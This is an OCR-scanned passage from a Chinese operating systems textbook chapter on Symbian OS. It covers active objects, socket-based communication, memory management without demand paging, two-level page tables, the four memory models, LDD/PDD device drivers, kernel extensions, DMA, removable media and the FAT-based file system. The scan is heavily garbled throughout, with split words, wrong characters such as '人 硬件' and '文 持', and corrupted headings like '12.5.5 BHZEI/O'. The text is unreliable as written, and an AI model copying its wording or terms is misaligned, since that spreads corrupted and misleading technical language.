间 ， 因 此 它们 上 共有 Symbian 操 作 系 统 线 程 的 特性 。 它 们 本 里 具 有 自己 的 
纳 线程 ， 并 且 能 够 加 入 Symbian 操 作 系 统 的 其 他 线程 构成 操作 系统 的 一 
个 进程 。 


假 右 活动 对 象 仅仅 是 Symbian 操作 系统 线程 ， 有 人 融会 问 操作 系统 
从 这 种 简化 的 线程 模型 中 得 到 了 什么 益处 。 活 动 对 象 的 关键 点 体现 在 调 
度 上 。 上 所 有 的 活动 对 象 在 等 竺 事件 的 时 候 驻 留 在 一 个 单一 进程 中 ， 对 系 
统 而 言 可 以 作为 一 个 单一 的 线程 。 内 核 不 必 连 续 地 检查 每 一 个 活动 对 象 
征 否 被 解除 阻 守 。 因 此 ， 单 一 进程 中 的 活动 对 象 ， 能 够 由 在 一 个 单一 线 
程 中 执行 的 单一 调度 器 来 协调 。 通 过 将 在 其 他 方面 作为 多 线程 执行 的 代 
码 结合 到 一 个 线程 中 ， 通 过 构建 固定 的 入 口 点 进入 代码 ， 以 及 通过 使 用 
一 个 单一 调度 器 来 协调 它们 的 执行 ， 活 动 对 象 构成 了 标准 线程 的 一 种 高 


效 、 轻 量 版 本 。 


认识 到 活动 对 象 和 Symbian 操作 系统 进程 结构 在 何 处 融合 成 为 一 体 
征 很 重要 的 。 当 一 个 传统 线程 通过 系统 调用 进入 等 待 状态 从 而 阻 豆 目 己 
的 运行 时 ， 操 作 系统 仍然 需要 检查 这 个 线程 。 在 上 下 文 切换 期 间 ， 操 作 
系统 需要 化 旨 时 间 检 查处 于 等 待 状态 的 阻塞 进程 ， 决 定 是 售 需 要 将 其 移 
动 到 如 绪 状 态 。 活 动 对 象 把 目 己 放 入 等 待 状态 以 等 竺 特定 的 事件 ， 因 
此 ， 操 作 系统 不 需要 去 检查 它们 ， 而 只 是 在 特定 的 事件 发 生 后 移动 它 


们 。 结 果 就 是 更 少 的 线程 检测 以 及 更 好 的 性 能 。 





12.3.4 ”进程 间 通 信 


在 类 似 Symbian 操 作 系统 的 多 线程 环境 中 ， 进 程 间 通 信 对 系统 性 能 
是 至 关 重 要 的 。 线 程 ， 特 别 是 系统 服务 形式 的 线程 经 名 通信 。 


套 接 字 是 Symbian 操作 系统 使 用 的 基本 通信 模型 。 它 是 两 个 端点 之 
间 抽 象 的 通信 管道 。 这 一 抽象 是 用 来 隐藏 端点 之 间 的 传输 方法 和 数据 管 
理 。Symbian 操 作 系 统 使 用 套 接 字 的 概念 在 客户 并 和 服务 器 端 之 间 、 线 
程 到 设备 之 间 以 及 线程 之 间 进 行 通信 。 


套 接 字 模型 也 构成 了 设备 MO 的 基础 。 抽 象 再 次 成 为 使 这 一 模型 更 
加 有 效 的 关键 。 同 一 个 设备 进行 数据 交换 的 所 有 机 制 不 是 由 应 用 程序 管 
理 的 ， 而 是 由 操作 系统 管理 的 。 例 如 ， 网 络 环境 中 工作 于 TCPAP 上 的 套 
接 字 可 以 很 容易 地 通过 改变 套 接 字 使 用 的 类 型 参数 而 适应 于 监 直 环境 。 
这 种 变换 下 ， 其 他 大 部 分 的 数据 交换 工作 都 是 由 操作 系统 完成 的 。 





Symbian 操作 系统 实现 了 通用 操作 系统 上 使 用 的 标准 同步 原 语 。 操 
作 系 统 中 广泛 地 使 用 了 信号 量 和 互 斥 量 的 一 些 形 式 。 这 些 为 进程 和 线程 
提供 同步 能 力 。 





12.4 ”内 存 管理 


诸如 Linux 和 Windows 系 统 中 的 内 存 管理 使 用 了 很 多 我 们 前 面 讲 过 
的 关于 实现 内 存 资 源 管 理 的 概念 。 例 如 ， 从 物理 内 存 框架 构建 的 虚拟 内 
存 页 面 、 按 需 分 页 的 虚拟 内 存 以 及 动态 页 面 置换 ， 这 些 概念 共同 给 出 近 
乎 无 限 的 内 存 资源 形象 。 这 里 物理 内 存 是 由 诸如 硬盘 空间 等 文 持 和 扩展 
的 。 


Symbian 操作 系统 和 实际 的 通用 操作 系统 一 样 ， 也 必须 提供 内 存 管 
理 模式 。 然 而 ， 由 于 智能 手机 上 的 存储 容量 非常 有 限 ， 内 存 模型 受到 限 
制 ， 而 且 进 行内 存 管理 的 时 候 不 能 使 用 虚拟 内 存 /交换 空间 模型 。 但 正 
是 如 此 ，Symbian 操 作 系统 使 用 了 我 们 讨论 过 的 内 存 管理 的 大 多 数 机 
制 ， 包 括 人 硬件 MMU。 





12.4.1 没有 虚拟 内 存 的 系统 


许多 计算 机 系统 没有 提供 成 熟 的 支持 按 需 分 页 的 虚拟 内 存 的 设备 。 
在 这 些 平台 上 操作 系统 可 以 获得 的 惟一 的 存储 设备 就 是 内 存 ， 它 们 没有 
人 硬盘 设备 。 正 因为 这 样 ， 大 多 数 较 小 的 系统 ， 从 PDA 到 智能 手机 ， 再 到 
更 高 层次 的 营 上 设备 ， 都 不 文 持 按 需 分 页 的 虚拟 内 存 。 





下 面 考虑 大 多 数 小 的 平台 设备 上 使 用 的 内 存 空间 。 这 些 系统 一 般 都 


有 两 种 类 型 的 存储 介质 : RAM 和 闪存 。RAM 存 储 操作 系统 代码 《〈 当 系 
统 启 动 时 使 用 ) ， 内 存 用 作 操 作 内 存 和 永久 性 《文件 ) 存储 介质 。 通 

常 ， 可 以 为 一 个 设备 〈 比 如 安全 数据 卡 ) 增添 额外 的 内 存 ， 这 些 存 储 空 
间 专 门 用 作 永 和 久 性 存储 。 


没有 文 持 按 需 分 页 的 虚拟 内 存 不 代表 缺少 内 存 管理 。 实 际 上 ， 大 多 
数 较 小 的 平台 构建 在 包含 许多 较 大 型 系统 的 管理 特征 的 硬件 上 。 这 些 管 
理 特征 包含 诸如 分 页 、 地 址 翻译 以 及 虚拟 /物理 地 址 抽象 。 没 有 虚拟 内 
存 仅仅 意味 着 页 面 不 能 从 内 存 交 换 出 去 并 存储 在 外 部 设备 上 ， 而 和 内存 页 
的 抽象 仍然 在 使 用 。 页 面 被 蔡 换 了 ,但 是 它们 也 只 是 被 丢弃 了 。 也 束 古 
说 只 有 代码 页 可 以 被 置换 ， 因 为 只 有 它们 备份 在 内 存 上 。 





内 存 管 理 包含 如 下 的 任务 : 





:应 用 程序 大 小 的 管理 : 应 用 程序 的 大 小 《所 有 的 代码 和 数据 ) 对 
如 何 使 用 内 存 有 很 大 的 影响 。 创 建 小 的 软件 需要 技巧 和 规则 。 使 用 面向 
对 象 的 设计 在 这 里 成 为 一 种 阻碍 (更 多 的 对 象 意 味 着 更 多 的 动态 内 存 分 
配 ， 而 这 需要 更 大 的 堆 尺 寸 ) 。 大 多 数 针对 较 小 平台 的 操作 系统 非 第 不 
或 励 任何 模块 的 静态 链接 。 

















' 扒 的 管理 ， 堆 《用 来 进行 动态 内 存 分 配 的 空间 ) 在 较 小 的 平台 上 
必须 严格 地 管理 。 堆 空间 在 较 小 的 平台 上 一 般 划 定 边 界 ， 以 便 程序 员 尺 
可 能 地 回收 和 重用 。 冒 险 越 界 会 导致 内 存 分 配 的 错误 。 


.就 地 执行 ， 没 有 磁盘 设备 的 平台 通常 支持 就 地 执行 。 这 就 是 说 办 
存 被 映射 到 虚拟 内 存 地 址 空间 ， 程 序 可 以 直接 从 闪存 上 执行 ， 而 不 需要 
首先 复制 到 RAM 上。 这 样 做 使 加 载 时间 减 小 为 零 ， 多 许 应 用 程序 迅速 
启动 ， 而 且 也 不 需要 使 用 稀缺 的 RAML。 














加载 动 态 链接 库 : 什么 时 候 加 载 动 态 链 接 库 的 选择 会 明显 影响 系 
统 性 能 。 例 如 ， 妆 应 用 程序 第 一 次 加 载 到 内 存 就 加 载 所 有 的 动态 链接 
库 ， 比 在 执行 中 不 定时 发 生 的 加 载 更 加 容易 接受 。 比 起 执行 时 应 用 程序 
发 生 延 人 运 ， 用 户 更 加 能 够 接受 局 动 它 时 有 一 些 滞后 。 注 意 动态 链接 库 可 
能 并 不 需要 加 载 ， 如 果 它 们 已 经 在 内 存 中 或 者 它们 包含 在 外 部 闪存 中 
(在 这 种 情况 下 ， 它 们 可 以 束 地 执行 〉 束 是 这 种 情况 。 

















EU RA Bote: 如果 有 MMU， 尺 可 能 地 使 用 它 。 实 际 上 ， 
将 越 多 的 功能 放 入 MMU， 系 统 的 性 能 越 好 。 


即使 使 用 就 地 执行 的 规则 ， 较 小 的 平台 仍然 需要 保留 一 部 分 内 存 用 
作 操 作 系 统 操 作 。 这 些 内 存 与 永久 性 存储 介质 共 至 ， 并 且 通 党 以 两 种 方 
法 中 的 一 种 进行 管理 。 首 先 ， 一 些 操 作 系 统 采用 一 种 十 分 简单 的 方法 ， 
内 存根 本 不 分 页 。 在 这 些 类 型 的 系统 中 ， 上 下 文 切换 意味 着 分 配 操 作 空 
间 〔 比 如 堆 空 间 〉 ， 同 时 在 所 有 进程 间 共 至 这 些 操作 空间 。 这 种 方法 在 
进程 的 存储 区 域 几乎 没有 保护 ， 信 任 进程 间 可 以 很 好 地 工作 。Palm 操 作 
系统 使 用 这 种 简单 的 方式 进行 内 存 管理 。 第 二 种 方法 是 使 用 一 种 更 加 有 
规则 的 方法 ， 内 存 被 切 分 成 为 页 ， 这 些 页 按照 操作 需要 分 配 。 操 作 系 统 














管理 一 个 空闲 列 表 来 保存 页 ， 按 照 需要 分 配给 操作 系统 和 用 户 进程 。 在 
这 种 方法 中 《由 于 没有 虚拟 内 存 ) ， 当 页 的 空闲 列表 用 光 时 ， 系 统 就 会 
没有 内 存 ， 从 而 不 会 再 有 分 配 发 生 。Symbian 操 作 系统 是 第 二 种 方法 的 
例子 。 


12.4.2 ”Symbian 操作 系统 的 寻 址 方式 


由 于 Symbian 操作 系统 是 32 位 系统 ， 因 此 寻 址 范围 可 以 达到 4GB。 
它 与 更 大 的 系统 一 样 使 用 同样 的 抽象 方式 ， 程序 必须 使 用 由 操作 系统 映 
射 到 物理 地 址 的 虚拟 地 址 。 和 大 多 数 系 统一 样 ，Symbian 操 作 系 统 把 内 
存 划 分 为 虚拟 页 面 和 物理 页 框 。 页 框 的 大 小 通常 是 4KB， 但 也 是 可 变 
的 。 





因为 最 大 具有 4GB 的 地 址 空间 ， 因 此 4KB 的 页 框 大 小 就 意味 着 具有 
超过 100 万 条 目的 页 表 。Symbian 操 作 系统 只 有 有 限 的 内 存 ， 因 此 不 能 拿 
出 1MB 内 存 专用 于 页 表 。 而 且 ， 对 这 么 大 的 一 张 表 的 搜索 和 访问 对 系统 
都 是 很 大 的 负担 。 为 了 解决 这 个 问题 ，Symbian 操 作 系 统 采用 2 级 页 表 方 
式 ， 如 图 12-2 所 示 。 称 作 页 面目 录 的 第 一 级 提供 一 个 到 第 二 级 的 链接 ， 
可 以 使 用 虚拟 地 址 的 一 部 分 进行 检索 〈 前 12 位 ) 。 该 目录 驻 留 在 内 存 
中 ， 由 TTBR〔 转 换 表 基 址 寄存 器 〉 指向 。 每 个 目录 条 目 指向 第 二 级 ， 
也 就 是 页 表 的 集合 。 这 些 页 表 提 供 到 某 一 内 存 中 特定 页 的 链接 ， 由 虚拟 
地 址 的 一 部 分 检索 〈 中 间 8 位 ) 。 最 后 ， 虚 拟 地 址 的 低 12 位 索引 检索 页 
的 字 。 在 这 一 虚拟 -物理 地 址 映射 计算 中 ， 硬 件 起 辅助 作用 。 尽 管 
Symbian 操作 系统 不 能 假定 任何 辅助 硬件 的 存在 ， 但 是 在 大 多 数 体系 中 
这 一 映射 转换 都 是 由 MMU 完 成 的 。 比 如 ARM 处 理 器 就 具有 扩展 的 
MMU， 带 有 转换 后 备 缓冲 器 来 辅助 地 址 计算 。 


























虚拟 地 址 
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图 12-2 Symbian 操作 系统 使 用 2 级 页 表 来 减少 页 表 访 问 时 间 和 占用 空 
间 


当 一 个 页 面 不 在 内 存 中 时 ， 就 会 出 现 错误 状态 ， 这 是 因为 当 一 个 应 
用 程序 局 动 的 时 候 所 有 的 应 用 程序 内 存 页 面 都 应 该 已 经 被 加 载 ( 没 有 请 
求 页 面 调度 )。 和 链接 到 可 执行 应 用 中 的 小 的 桩 代码 显 式 地 把 动态 加 载 库 
加 载 到 内 存 中 ， 而 不 是 通过 页 失效 方式 。 








Symbian 操作 系统 中 尽管 没有 页 交换 ， 但 内 存 却 不 可 思议 地 是 动态 


的 。 应 用 程序 通过 内 存 进行 上 下 文 切 换 ， 同 时 正如 上 面 所 说 的 ， 当 应 用 
程序 开始 执行 时 将 它们 所 需要 的 存储 空间 加 载 到 内 存 中 。 每 个 应 用 程序 
需要 的 内 存 页 面 能 够 从 操作 系统 中 静态 请 求 进入 内 存 。 对 于 堆 《〈 更 确切 
地 说 是 动态 空间 ) 是 有 界限 的 ， 因 此 静态 请 求 也 可 以 由 动态 空间 来 实 
现 。 从 一 个 空闲 页 框 的 列表 中 分 配 页 框 绘 页面， 如果 没有 空闲 页 框 ， 那 
么 就 会 出 现 错误 。 正 在 使 用 的 页 框 不 能 被 刚 到 的 应 用 程序 的 页 面 伏 换 ， 
即使 该 页 框 是 针对 当前 没有 执行 的 应 用 程序 的 。 这 是 由 于 Symbian 操 作 
系统 中 没有 页 交换 ， 同 时 因为 十 分 有 限 的 内 存 空 间 只 给 用 户 文件 使 用 ， 
也 就 没有 空间 来 复制 被 收回 空间 的 页 面 。 





























实际 上 Symbian 操作 系统 使 用 的 存储 实现 模型 有 四 种 不 同 的 版 本 。 
每 种 模型 都 是 为 了 特定 类 型 的 硬件 配置 。 一 个 简要 的 列表 如 下 : 


-移动 模型 : 该 模型 是 为 早期 的 ARM 体 系 结构 设计 的 。 移 动 模型 中 
的 页 目录 是 4KB 长 ， 每 个 条 目 4 字 市 ， 给 出 一 块 16KB 大 小 的 目录 。 通 过 
与 页 框 相关 的 存 取 位 和 使 用 域 来 标志 存储 器 访问 的 方式 保护 存储 页 面 。 
域 信息 记录 在 页 表 目 录 ，MMU 为 每 个 域 实现 访问 权限 。 尽 管 没 有 明确 
使 用 分 段 ， 但 是 在 内 存 布局 上 有 如 下 结构 : 有 用 户 分 配 数据 的 数据 区 ， 
也 有 内 核 分 配 数据 的 内 核 区 。 
































复合 模型 :该 模型 是 为 ARM6 或 者 之 后 的 体系 开发 的 模式 。 这 些 版 
本 中 的 MMU 与 以 前 版 本 使 用 的 不 同 。 例 如 ， 由 于 页 表 目 录 能 分 成 两 部 
分 ， 每 个 部 分 索引 页 表 的 不 同 部 分 ， 因 此 需要 不 同 的 处 理 方 式 。 这 两 部 














分 分 别 用 作用 户 页 表 和 内 核 页 表 。ARM 体 系 中 新 的 版 本 修订 并 增强 了 
每 个 页 框 的 访问 位 ， 但 是 不 赞成 使 用 域 的 概念 。 


直接 模型 :该 模型 假定 根本 就 没有 MMU。 这 一 模型 很 少 使 用 ， 并 
且 在 智能 手机 上 禁止 使 用 。 没 有 MMU 会 导致 严重 的 性 能 问题 。 由 于 某 
些 原 因 ，MMU 被 茶 止 的 一 些 场合 中 该 模式 比较 有 用 。 


仿真 模型 : 该 模型 是 为 了 支持 基于 windows 宿 主机 的 Symbian 操作 
系统 仿真 器 。 仿 真 器 与 实际 的 目标 CPU 几乎 没有 区 别 。 仿 真 器 作为 一 个 
单独 的 Windows 进 程 运行 ， 因 此 地 址 空间 被 限定 为 2GB， 而 不 是 4GB。 
为 仿真 器 提供 的 所 有 内 存 可 以 被 任何 Symbian 操 作 系 统 进程 访问 ， 因 此 
不 具有 内 存 保护 。Symbian 操 作 系统 库 以 Windows 格 式 的 动态 链接 库 形 
式 提供 ， 因 此 Windows 处 理 内 存 的 分 配 和 管理 。 


12.5 输入 和 输出 


Symbian 操 作 系 统 的 输入 /输出 结构 仿照 其 他 操作 系统 的 设计 。 本 市 
会 指出 其 中 一 些 Symbian 操作 系统 特有 的 基于 目 己 目标 平台 的 性 质 。 











12.5.1 设备 驱动 


在 Symbian 操作 系统 中 ， 设 备 驱动 作为 具有 内 核 权 限 的 代码 运行 ， 
从 而 赋予 用 户 级 别 的 代码 对 系统 保护 资源 的 访问 能 力 。 同 Linux 与 
Windows 一 样 ， 设 备 驱 动 程序 代表 软件 去 访问 人 硬件 。 





Symbian 操作 系统 中 的 设备 驱动 分 为 两 层 : 一 个 是 逻辑 设备 驱动 
(LDD) ， 一 个 是 物理 设备 驱动 (PDD) 。LDD 为 上 层 软 件 提供 一 个 接 
口 ， 而 PDD 直 接 与 硬件 进行 交互 。 在 这 种 模型 下 ，LDD 可 以 为 一 类 特定 
的 设备 使 用 相同 的 实现 ， 而 PDD 随 着 不 同 的 设备 改变 。Symbian 操 作 系 
统 支 持 许多 标准 的 LDD。 有 时 ， 如 果 人 硬件 非常 标准 或 者 常用 ，Symbian 
操作 系统 也 提供 PDD。 





考虑 串 行 设 备 的 一 个 例子 。Symbian 操 作 系 统 定义 了 一 个 通用 的 串 
行 LDD， 该 LDD 定 义 了 访问 串 行 设备 的 程序 接口 。LDD 给 PDD 提 供 一 个 
接口 ，PDD 提 供 串 行 设 备 访问 接口 。PDD 实 现 有 助 于 调节 CPU 和 串 行 设 
备 之 间 速 度 差 异 所 必需 的 缓冲 和 流 控制 机 制 。 一 个 单一 的 LDD“〈 用 户 那 





边 ) 可 以 连接 任何 用 来 运行 串 行 设备 的 PDD。 在 某 个 特定 的 智能 手机 
上 ， 这 些 PDD 可 能 包括 一 个 红外 端口 或 者 一 个 RS-232 端 口 。 这 两 个 是 非 
常 好 的 例子 ， 它 们 使 用 相同 的 串 行 LDD， 但 是 使 用 不 同 的 PDD。 


当 LDD 和 PDD 不 在 内 存 中 时 ， 它 们 可 以 由 用 户 程 序 动态 地 加 载 进 内 
存 。 程 序 编制 工具 能 够 检查 是 否 需要 加 载 。 


12.5.2 WT JE 


内 核 扩 展 就 是 Symbian 操作 系统 在 引导 时 刻 加 载 的 驱动 程序 。 由 于 
它们 是 在 引导 时 刻 加 载 的 ， 因 此 是 与 标准 的 设备 驱动 区 别 对 待 的 特殊 情 
况 。 





内 核 扩 展 与 标准 的 设备 驱动 不 同 。 大 多 数 设 备 驱 动 是 由 LDD 同 成 对 
的 PDD 实 现 的 ， 在 用 户 空 间 程 序 需要 的 时 候 加 载 。 内 核 扩 展 在 引导 时 刻 
加 载 ， 针 对 特定 的 设备 ， 通 常 没 有 成 对 的 PDD。 














内 核 扩 展 是 引导 过 程 的 一 部 分 。 这 些 特殊 的 设备 驱动 在 调度 卉 局 动 
之 后 加 载 并 且 局 动 。 和 它们 执行 对 于 操作 系统 非常 重要 的 功能 : DMA 服 
务 、 显 示 管 理 、 对 外 设 的 总 线 控制 〈 例 如 USB 总 线 ) 。 之 所 以 提供 它们 
有 两 个 原因 。 首 先 ， 它 与 我 们 已 经 看 作 是 微 内 核 设 计 特征 的 面向 对 象 设 
计 抽 象 相称 。 其 次 ， 它 允许 Symbian 操 作 系 统 所 处 的 不 同 平台 运行 专门 
的 设备 驱动 ， 从 而 不 需要 重新 编译 内 核 而 使 用 人 硬件 。 





12.5.3 ”直接 存储 器 访问 


设备 驱动 经 常 使 用 DMA，Symbian 操 作 系 统 支持 DMA 人 硬件 的 使 
用 。DMA 人 硬件 包含 一 个 控制 一 系列 DMA 通 道 的 控制 器 。 每 个 通道 提供 
内 存 和 设备 闻 的 单一 方向 的 通信 ， 因 此 ， 数 据 的 双向 传输 需要 两 个 
DMA 通 道 。 至 少 有 一 对 DMA 通 道 是 专用 于 显示 LCD 控 制 器 的 。 此 外 ， 
大 多 数 平台 提供 一 定数 量 的 常规 DMA 通 道 。 








一 旦 一 个 设备 把 数据 传送 到 内 存 ， 就 会 激发 一 个 系统 中 断 。PDD 为 
了 传输 设备 使 用 DMA 硬 件 提供 的 DMA 服 务 ， 这 里 传输 设备 是 指 与 硬件 
接口 的 设备 驱动 的 一 部 分 。 在 PDD 与 DMA 控 制 器 之 间 ，Symbian 操 作 系 
统 实现 两 层 软件 ， 一 个 软件 的 DMA 层 ， 一 个 与 DMA 人 硬件 接口 的 内 核 扩 
展 。DMA 层 把 自身 分 成 平台 独立 层 和 台 相 关 层 。 作 为 内 核 扩 展 ，DMA 
层 在 引导 进程 中 是 内 核 启 动 的 第 一 批 设备 驱动 的 一 个 。 











由 于 特殊 的 原因 ， 对 DMA 的 支持 是 比较 复杂 的 。Symbian 操 作 系 统 
支持 许多 不 同 的 硬件 配置 ， 但 是 没有 提供 缺 省 的 DMA 配 置 。 与 DMA 硬 
件 的 接口 是 标准 化 的 ， 由 平台 无 关 层 来 提供 。 平 台 相 关 层 和 内 核 扩展 由 
生产 厂商 提供 ， 这 样 Symbian 操 作 系统 就 如 对 其 他 设备 一 样 处 理 DMA 硬 
件 : 在 LDD 和 PDD 构 件 中 具有 设备 驱动 。 由 于 DMA 便 件 本 号 是 一 个 设 
备 ， 并 且 它 并 行 了 Symbian 操作 系统 支持 所 有 设备 的 方式 ， 因 此 这 种 实 





现 文 持 的 方式 是 合理 的 。 


12.5.4 ”特殊 情况 : 存储 介质 


Symbian 操作 系统 中 存储 介质 驱动 是 PDD 的 一 种 特殊 形式 ， 文 件 服 
务 器 排他 地 使 用 它们 来 实现 对 存储 介质 设备 的 访问 。 因 为 智能 手机 既 可 
以 容纳 固定 的 存储 介质 也 可 以 容纳 移动 的 存储 介质 ， 所 以 存储 介质 驱动 
必须 识别 和 支持 多 种 形式 的 存储 介质 。Symbian 操 作 系 统 对 介质 的 支持 
包括 一 个 标准 的 LDD 和 为 用 户 提 供 的 接口 API。 





Symbian 操作 系统 中 的 文件 服务 器 能 够 同时 文 持 多 达 26 个 不 同 的 设 
备 。 本 地 设备 ， 像 在 Windows 中 一 样 ， 通 过 张 动 句号 来 区 分 。 


12.5.5 BHZEI/O 


Symbian 操作 系统 通过 活动 对 象 处 理 阻 塞 JO。 设 计 者 认识 到 等 生 
IO 事件 的 所 有 线程 的 负荷 会 影响 系统 中 的 其 他 线程 这 一 事实 。 活 动 对 
象 使 得 阻 赛 JO 调 用 可 以 由 操作 系统 来 处 理 ， 而 不 是 进程 目 身 。 活 动 对 
象 由 一 个 调度 器 进行 协调 并 且 在 一 个 单独 的 线程 中 执行 。 





当 活 动 对 象 使 用 一 个 阻塞 IO 调用 时 ， 它 用 信和 号 通知 操作 系统 并 且 
把 自身 挂 起 。 当 调用 完成 时 ， 操 作 系 统 唤醒 挂 起 的 进程 ， 该 进程 如 同 带 
有 数据 返回 的 函数 一 样 继续 执行 。 区 别 只 是 对 于 活动 对 象 的 一 个 观点 : 
它 不 能 调用 一 个 函数 并 期 待 一 个 返回 值 ， 它 必须 调用 一 个 特殊 的 函数 并 
且 使 该 函数 设置 阻塞 WO， 但 是 立刻 返回 。 操 作 系 统 接管 等 待 过 程 。 





12.5.6 ”可 移动 存储 器 


可 移动 存储 器 带 给 操作 系统 设计 人 员 一 个 有 趣 的 两 难处 境 。 当 往 读 
取 槽 插入 一 张 安全 数据 (Secure Digital, SD) 卡 时 ， 该 卡 就 同 其 他 设备 
一 样 成 为 一 个 设备 。 它 需要 一 个 控制 器 、 一 个 驱动 、 一 种 总 线 结构 ， 而 
且 很 有 可 能 通过 DMA 与 CPU 进行 通信 。 人 然而， 对 这 类 模型 移 除 存储 介 
质 是 一 个 很 严重 的 问题 : 操作 系统 怎样 检测 插入 和 移 除 ?” 这 一 模型 如 何 
适应 一 张 介质 卡 的 不 存在 ?还 有 更 加 复杂 的 情况 ， 一 些 设备 槽 能 够 兼容 
不 止 一 种 类 型 的 设备 。 例 如 ， 一 张 SD 卡 ， 一 张 miniSD 卡 ( 带 有 适 配 
器 ) ， 以 及 一 张 多 媒体 卡 都 使 用 同一 类 插 模 。 


Symbian 操作 系统 使 用 可 移动 存储 器 的 很 多 共同 性 来 实现 对 它们 的 
支持 。 每 种 可 移动 存储 絮 通 党 具有 如 下 特点 : 





1) 所 有 的 设备 必须 支持 插入 和 移 除 。 





2) 所 有 的 可 移动 存储 器 能 够 “ 热 ” 拔 ， 也 就 是 正在 使 用 时 被 拔 下 。 


自己 的 容 


D} 
sh 


3) 每 种 介质 部 能 报告 
4) 必 须 拒绝 不 适 配 的 卡 。 


5) 每 种 卡 都 需要 电源 。 


为 了 文 持 可 移动 存储 器 ，Symbian 操 作 系统 提供 控制 每 种 文 持 卡 片 
的 软件 控制 器 。 这 些 控制 器 和 设备 驱动 工作 在 一 起 ， 这 在 软件 层面 上 也 
是 一 样 的 。 当 一 张 卡 插入 时 ， 残 创建 了 一 个 套 接 字 对 象 ， 该 套 接 字 对 象 
构成 数据 流动 过 程 中 的 通道 。 为 了 适应 卡 状态 的 改变 ，Symbian 操 作 系 
统 提供 了 一 系列 的 当 状 态 改变 发 生 时 的 事件 。 设 备 驱 动 像 活动 对 象 一 样 
被 配置 用 来 监听 这 些 事件 并 作出 反应 。 





12.6 存储 系统 


和 所 有 面向 用 户 的 操作 系统 一 样 ，Symbian 操 作 系 统 有 一 个 文件 系 
统 。 下 面 我 们 来 对 其 进行 描述 。 


12.6.1 移动 设备 文件 系统 


就 文件 系统 和 存储 而 言 ， 手 机 操作 系统 有 很 多 和 人 台式 机 操作 系统 相 
同 的 需求 。 多 数 的 这 类 系统 都 实现 在 32 位 硬件 平台 上 ; 允许 用 户 以 任意 
的 名 字 命 名 文件 ， 大 量 存 储 文件 ， 需 要 一 定 的 组 织 结构 。 这 意味 着 我 们 
需要 一 个 分 层 的 、 基 于 目录 的 文件 系统 。 而 且 ， 手 机 操作 系统 设计 人 员 
有 很 多 文件 系统 可 以 选择 时 ， 一 个 很 重要 的 特性 影响 了 他 们 的 选择 : 大 
多 数 手 机 存储 介质 可 以 和 Windows 环 境 共 享 使 用 。 





如 果 手 机 系统 中 没有 可 移动 存储 器 件 ， 则 任 一 种 文件 系统 都 是 可 以 
使 用 的 。 但 是 ， 对 于 使 用 闪存 作为 存储 的 系统 来 说 ， 还 有 特殊 的 情况 需 
要 考虑 。 存 储 块 一 般 部 是 512 字 节 到 2048 字 节 ， 但 内 存 不 能 直接 修改 数 
据 记 录 ， 而 需要 先 擦 除数 据 ， 然 后 才能 进行 写 入 。 为 外 ， 探 除 的 操作 很 
不 精确 ， 每 次 探 除 不 能 只 欣 除 一 个 字 节 ， 而 必须 欣 除 整个 块 。 迫 除 速 度 


相对 比较 慢 。 











为 了 顺应 这 些 特征 ， 并 且 使 内 存 工 作 效率 最 高 ， 需 要 文件 系统 能 够 


把 写 操作 分 散 到 整个 器 件 ， 以 及 解决 较 长 的 控 除 时 间 问 题 。 一 个 基本 的 
概念 是 ， 当 文件 被 更 新 时 ， 文 件 系 统 会 将 文件 的 更 新 副本 写 入 空闲 的 存 
储 块 并 修改 文件 指针 ， 而 在 有 空闲 时 间 时 再 进行 旧 数 据 块 的 回收 操作 。 





最 早 的 闪存 文件 系统 之 一 是 微软 公司 在 20 世 纪 90 年 代 初 为 MS-DOS 
使 用 的 FFS2 文 件 系 统 。 在 1994 年 PCMCIA 工 业 组 织 通 过 了 关于 闪存 的 闪 
存 传输 层 (Flash Translation Layer) 标准 后 ， 闪 存 器 件 可 以 被 识别 为 一 
个 FAT 文 件 系统 。Linux 同 时 也 专门 为 内 存 设计 了 JFFS (Journaling Flash 
File System) 和 YAFFS (Yet Another Flash Filing System) 两 种 文件 系 
统 。 





但 是 ， 移 动 平台 必须 和 其 他 计算 机 共享 存储 介质 ， 这 就 要 求 必 须 有 
一 定 的 兼容 措施 。FAT 文 件 系 统 是 最 常用 到 的 。 而 且 ， 由 于 与 FAT-32 相 
比 ，FAT-16 有 着 较 小 的 分 配 表 以 及 长 文件 的 简化 用 法 ， 所 以 FAT-16 的 
使 用 更 为 广泛 。 


12.6.2 ”Symbian 操作 系统 文件 系统 





作为 智能 手机 操作 系统 ，Symban OS 至 少 需 要 实现 FAT-16 文 件 系 
统 。 实 际 上 ， 它 的 确 支持 FAT-16， 并 在 大 多 数 存储 介质 上 使 用 。 


但 是 ，Symbian 操 作 系统 文件 服务 器 是 建立 在 一 个 类 似 Linux 的 虚拟 
文件 系统 的 抽象 层 上 的 。 面 问 对 象 技术 允许 多 种 文件 系统 的 实现 代码 作 
为 文件 服务 咒 的 插件 使 用 ， 于 是 允许 同时 使 用 多 种 文件 系统 。 多 种 文件 
系统 的 实现 代码 可 以 在 一 个 文件 服务 器 中 共存 。 


Symbian 操作 系统 也 文 持 NFS 和 SMB 文 件 系 统 。 


126.3 ”文件 系统 安全 和 保护 


ie 


能 手机 安全 是 通用 计算 机 安全 的 一 个 有 趣 的 变 体 。 有 很 多 侧面 特 
征 使 得 智能 手机 安全 更 富有 挑战 。Symbian 操 作 系 统 在 设计 选择 上 有 很 
多 与 通用 计算 平台 和 其 他 智能 手机 平台 不 同 的 地 方 。 在 这 里 我 们 只 关注 
和 文件 系统 安全 有 关 的 特征 ， 其 他 方面 将 在 下 一 节 中 进行 讨论 。 


考虑 到 智能 手机 的 环境 ， 它 们 属于 单 用 户 设备 ， 不 需要 在 使 用 前 进 
行 用 户 认 证 。 一 个 手机 用 户 可 以 执行 应 用 程序 、 拨 打 电 话 、 访 问 网 络 ， 
全 都 不 需要 用 户 认 证 。 在 这 样 的 环境 下 ， 使 用 基于 权限 的 安全 措施 是 很 
有 挑战 性 的 ， 因 为 缺乏 认证 机 制 意味 着 只 有 一 组 权限 可 以 使 用 ， 即 所 有 
人 使 用 同样 的 一 组 权限 。 








除了 权限 ， 安 全 经 常 受益 于 其 他 形 陈 的 信息 。 在 Symbian 操作 系统 
版 本 9 或 更 新 的 版 本 中 ， 应 用 程序 在 安装 时 就 已 被 指定 了 其 行为 能 
授予 一 个 应 用 程序 权限 的 机 制 将 在 下 一 节 涉 及 ) 。 一 个 应 用 程序 在 请 
求 执行 条 项 行为 时 ， 其 行为 能 力 集 将 被 检查 。 如 果 这 种 访问 在 行为 能 
集中 存在 ,访问 被 许可 ， 否 则 被 拒绝 。 行 为 能 力 检 查 会 造成 一 些 系统 开 
